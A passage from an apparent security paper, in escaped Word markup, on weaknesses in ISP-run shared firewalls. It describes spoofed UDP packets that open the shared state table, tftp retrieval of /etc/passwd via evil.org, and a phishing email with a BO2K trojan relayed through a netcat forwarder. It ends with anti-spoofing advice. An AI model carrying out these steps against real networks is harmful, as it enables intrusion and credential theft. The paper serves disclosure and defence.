Firewall |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  
&lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;/&lt;span style=""&gt;    &lt;/span&gt;|&lt;span style=""&gt;     &lt;/span&gt;\&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                         &lt;/span&gt;/&lt;span style=""&gt;     &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;\&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;| Cust-1 |&lt;span style=""&gt;  &lt;/span&gt;| Cust-2 |&lt;span style=""&gt;  &lt;/span&gt;| Cust-3 | ...&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;span style=""&gt;  &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                &lt;/span&gt;nice.com&lt;span style=""&gt;    &lt;/span&gt;mean.com&lt;span style=""&gt;       &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                 &lt;/span&gt;Figure 
3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Staging the attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Since they all share the same state table, Cust-2 could inject fake UDP packets&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;containing Cust-1's source IP and Mr. Evil's destination IP. Let's place &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;ourselves in Mr. Mean's shoes and make a coordinated attack on nice.com.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;First, we call up Mr. Evil, or indeed, we just log into an account at evil.org,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;that way we don't have to pay anyone to do our dirty deed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Then there are a few ways we can do the next stage. 
If we know that nice.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is comprised of UNIX machines, we could try exploiting the possibility of &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;poorly configured tftpd(8) servers. Gaining unauthorized files using tftp(1) &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is a very old attack, as we well know. However, tftpd(8) servers are &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;surprisingly often present on networks that rely on firewalls to protect them. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;I am quite sure there are some other remote exploits we could use; rpc.statd&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;or rpc.mountd perhaps. tftp(1) is used as an example as it is an easy thing&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;to describe. Anyway. 
Back to our dirty deed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;We send the following spoofed packets from mean.com:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;src_ip:src_port&lt;span style=""&gt;              &lt;/span&gt;dst_ip:dst_port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;1.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;2.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;3.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;          &lt;/span&gt;..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;  
&lt;/span&gt;..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;254.nice.com:69&lt;span style=""&gt;              &lt;/span&gt;evil.org:31337 &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;From evil.org we fire up nmap[1] as root, and tell it to scan for machines&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;1-254.nice.com using source port 31337 and destination port 69. We (hopefully)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;get a few results back. It is probably a good idea to start the nmap scan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;fairly soon after we inject the spoofed packets through the firewall/RACL as&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the state table won't keep the UDP traffic valid for very long.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;When we have a list of usable tftpd(8) servers, we fire up our patched version&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;of tftp(1) which will let us issue requests with predefined source ports (in &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;this case 
31337).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;That's about it. The firewall will (if all goes to plan[2]) let the traffic&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;through, and if there are any ill-configured tftpd(8) servers there, we might&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;be able to grab /etc/passwd (or perhaps their gateway-conf[3] files).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Another attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;--------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;We could also stage an attack against a Windows network, but the attack &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;outlined below doesn't implicitly need mean.com. An attacker from evil.org&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;could do the same attack without having help from the "inside", i.e. 
there&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;would be no need for a port forwarder on evil.org; one could just fire up the&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;BO2K administration software there. (I ran out of ideas here, ok? Perhaps one &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;could stage a NetBIOS attack or something.)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Set up a port forwarder on evil.org, which points UDP port 1138 to &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;salesguy.nice.com port 53. Netcat (hobbit@avian.org) can be used for this.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;1) Send an email to some of his employees (phone up nice.com's&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;switchboard for the email of a sales person).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;2) Send "Dancing Pigs" + BO2K attachment to sales guy. 
Configure BO2K&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;to use UDP on port 53 (perhaps using this port will not seem&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;too suspicious in any firewall logs, as it could be confused with&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;a regular DNS request).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;3) Wait for BO2K to install itself (SpeakEasy or ButtTrumpet will &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;tell us when this has happened).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Send the following fake UDP packet from mean.com:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;src_ip:src_port&lt;span style=""&gt;              
&lt;/span&gt;dst_ip:dst_port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;salesguy.nice.com:53&lt;span style=""&gt;         &lt;/span&gt;evil.org:1138&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Start our BO2K administration software, and connect to evil.org:1138. We &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;should[2] now have control over salesguy.nice.com.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Conclusion&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;----------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Historically, it has been well documented in security papers that UDP is a &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;very difficult protocol to handle securely. 
Despite this well known fact, more &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;and more applications have been built on this weak foundation. The reasons &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;vary, but the truth is that UDP is a very simple (and fast) protocol to base &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;higher level protocols on. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Customers should not rely solely on the protection offered by the ISP when &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;purchasing this type of service. This paper has discussed two attacks against&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a poorly implemented "centralized firewall", with a few hints towards other&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;attacks. It should be clear that this is a very real threat. 
Failure to &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;recognize this fact could lead to a very embarrassing compromise.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;It is imperative that there's some form of spoofing protection in place on &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the company's border perimeter. In&lt;span style=""&gt;  &lt;/span&gt;figure 1, this can easily be achieved by &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;using regular ACLs on the Access Router (2). Without having delved too deep &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;into the matter, it is possible that CEF[4] could be used too. CEF, however,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;does not work on all Cisco IOS routers; consult your manual.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;If RACLs (figure 2) are used, the ISP can prevent spoofing by using separate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;RACLs for each customer. 
This, however, can become a huge configuration issue,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;depending on how many dial-up customers the ISP has.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Addendum&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;--------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;It should also be noted that some ISPs also provide a hosting service with&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;"firewall protection". Figure 4 shows a general overview. 
&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;span style=""&gt;                              &lt;/span&gt;{Internet}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                   &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                   &lt;/span&gt;| Router |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                   &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                  &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                  &lt;/span&gt;| Firewall | &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: 
Arial;"&gt;&lt;span style=""&gt;                                  &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                        &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;+--------+&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;&lt;span style=""&gt;             &lt;/span&gt;| Cust |---| Switch |---| Cust |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                        &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;+--------+&lt;span style=""&gt;   